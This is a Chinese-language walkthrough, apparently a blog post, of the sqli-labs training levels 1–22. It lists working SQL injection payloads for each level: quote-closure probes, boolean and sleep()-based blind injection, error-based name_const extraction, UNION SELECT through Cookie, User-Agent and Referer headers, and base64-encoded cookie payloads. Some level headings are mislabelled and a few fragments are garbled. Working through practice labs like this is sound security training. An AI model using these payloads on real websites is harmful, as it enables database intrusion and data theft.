目录
第一关:
第二关:
第三关:
第四关:
第五关(盲注):
第六关(盲注):
第七关(报错盲注):
第八关(时间盲注):
第九关(时间盲注):
第十关(时间盲注):
第十一关(报错):
第十二关:
第十三关:
第十四关:
第十五关(布尔类型盲注):
第十六关:
第十七关(update):
第十八关(头部注入insert型):
第十九关:
第二十关:
第二十关(base64编码):
第二十二关:
第一关:
先用’试试水
id=1'果然发现报错了,直接干
#有返回" />第三关:
?id=1 ' and 1=1--+#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1?id=1 " and 1=1--+?id=1 " and 1=2--+第四关:
?id=1' and 1=1 --+?id=1" and 1=1 --+#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1#上面报错觉得是'的问题所以用"'?id=1"' and 1=1 --+#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and 1=2 -- ") LIMIT 0,1' at line 1#报错看到--后面是"),猜到是")来闭合?id=1") and 1=1 --+?id=1") and 1=2 --+第五关(盲注):
?id=1 ' and 1=1--+?id=1 ' and 1=2--+第六关(盲注):
?id=1?id=1'?id=1"?id=1 " and 1=1--+?id=1 " and 1=2--+第七关(报错盲注):
?id=1'"#You have an error in your SQL syntaxYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"')) LIMIT 0,1' at line 1?id=1 ')) and 1=1--+ #true and true 为 true?id=1 ')) and 1=2--+ #true and false 为 true#You have an error in your SQL syntax第八关(时间盲注):
?id=1?id=1'?id=1' and 1=1 --+#You are in...........?id=1' and 1=2 --+#什么都不回显,可以使用时间盲注sleep()函数第九关(时间盲注):
一开始没什么怎么搞都没反应,觉得是个盲注,然后看了一下源码,构造payload
?id=1' and if(length(database())=8,sleep(10),sleep(1))--+?id=1' and if(length(database())=5,sleep(10),sleep(1))--+#电脑垃圾自带延迟两秒
第十关(时间盲注):
" />
第十一关(报错):
这里的注释用#
Username =admin '#Password =admin/*Your Login name:adminYour Password:admin*/Username=admin 'order by 1#
Username=admin 'order by 10#
第十二关:
Username =admin ' ##没有回显Username =admin " ##You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1#报错了在"后加个'Username =admin "' ##You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''#") and password=("admin") LIMIT 0,1' at line 1#报错出#号后面的东西可以写出payloadUsername =admin ") and 1=1 #//回显//Your Login name:admin//Your Password:adminUsername =admin ") and 1=2 #//没有回显第十三关:
Username = admin ' ##You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1Username = admin '"##You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"#') and password=('admin') LIMIT 0,1' at line 1#报错提示 #') payloadUsername = admin ') and if(length(database())=8,sleep(10),sleep(1)) ##延迟10秒闭合成功第十四关:
Username = admin '#Username = admin "#Username = admin '"#Username = admin "'##You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''#" and password="admin" LIMIT 0,1' at line 1#报错#" payloadUsername = admin "and if(length(database())=8,sleep(10),sleep(1)) #第十五关(布尔类型盲注):
Username =admin '##登录成功Username =admin "##登录失败#payloadUsername =admin ' and length(database())>7 ##登录成功Username =admin ' and length(database())>9 ##登录失败第十六关:
Username =admin '##登录失败Username =admin "##登录失败Username =admin ')##登录失败Username =admin ")##登录成功#payloadUsername =admin ") and length(database())>7 ##登录成功Username =admin ") and length(database())>9 ##登录失败第十七关(update):
源码接收uname和passwd部分
$uname=check_input($con1, $_POST['uname']); #源码定义了check_input函数,用于过滤长度和魔法引号$passwd=$_POST['passwd'];#passwd接收没有调用check_input可以在passwd这里进行注入check_input
function check_input($con1, $value){if(!empty($value)){// truncation (see comments)$value = substr($value,0,15); //取前15位}// Stripslashes if magic quotes enabledif (get_magic_quotes_gpc()){$value = stripslashes($value);}// Quote if not a numberif (!ctype_digit($value)){$value = "'" . mysqli_real_escape_string($con1, $value) . "'";}else{$value = intval($value);}return $value;}payload
username = adminpassword =admin 'or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or'#爆出数据库版本第十八关(头部注入insert型):
接收username和passwd
$uname = check_input($con1, $_POST['uname']);$passwd = check_input($con1, $_POST['passwd']);sql语句,会先验证账号密码是否正确正确才执行第二句sql语句
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysqli_query($con1, $sql);$row1 = mysqli_fetch_array($result1, MYSQLI_BOTH);if($row1){echo '';$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";mysqli_query($con1, $insert);//echo 'Your IP ADDRESS is: ' .$IP;echo "";//echo "
";echo '';echo 'Your User Agent is: ' .$uagent;echo "";echo "
";print_r(mysqli_error($con1));echo "
";echo '
';echo "
";}在代码中可以看出用单引号来闭合构造payload (我的这里的数据库版本比较低用不了updatexml和extractvalue,只能用sleep来实验是否注入成功,后面都是用sleep来实验)
User-Agent:1',1,1)#
User-Agent:1',1,sleep(5))#
第十九关:
直接输入
username=adminpassword=admin
回显referer的信息,用burpsuit抓包尝试对referer进行注入
Referer: '#报错 192.168.3.178'), 猜测是insert型,而且是两个参数是用单引号闭合,写payloadReferer: ',sleep(5))#第二十关:
直接输入
username=adminpassword=admin
回显信息,用burpsuit抓包尝试进行注入
Cookie: uname=admin'#报错Cookie: uname=admin'##不报错payloadCookie: uname=admin' order by 3#Cookie: uname=-admin' union select 1,2,3#Cookie: uname=-admin' union select 1,version(),database()#第二十关(base64编码):
用admin:admin登录显示
这里补充一个点,cookie值是有base64编码的,假如有注入点,我们需要先解码成原文,再在原文的基础上构造payload,构造完在进行base64编码发包给服务端。否则不能注入。
编码的操作太繁琐了我直接放payload#admin ') order by 3#Cookie: uname=YWRtaW4gJykgb3JkZXIgYnkgMyM=#-admin ') union select 1,2,3#Cookie: uname=LWFkbWluICcpIHVuaW9uIHNlbGVjdCAxLDIsMyM=第二十二关:
思路和第二十一关一样,不过二十二是双引号
#admin " order by 3#Cookie: uname=YWRtaW4gIiBvcmRlciBieSAzIw==#-admin " union select 1,2,3#Cookie: uname=LWFkbWluICIgdW5pb24gc2VsZWN0IDEsMiwzIw==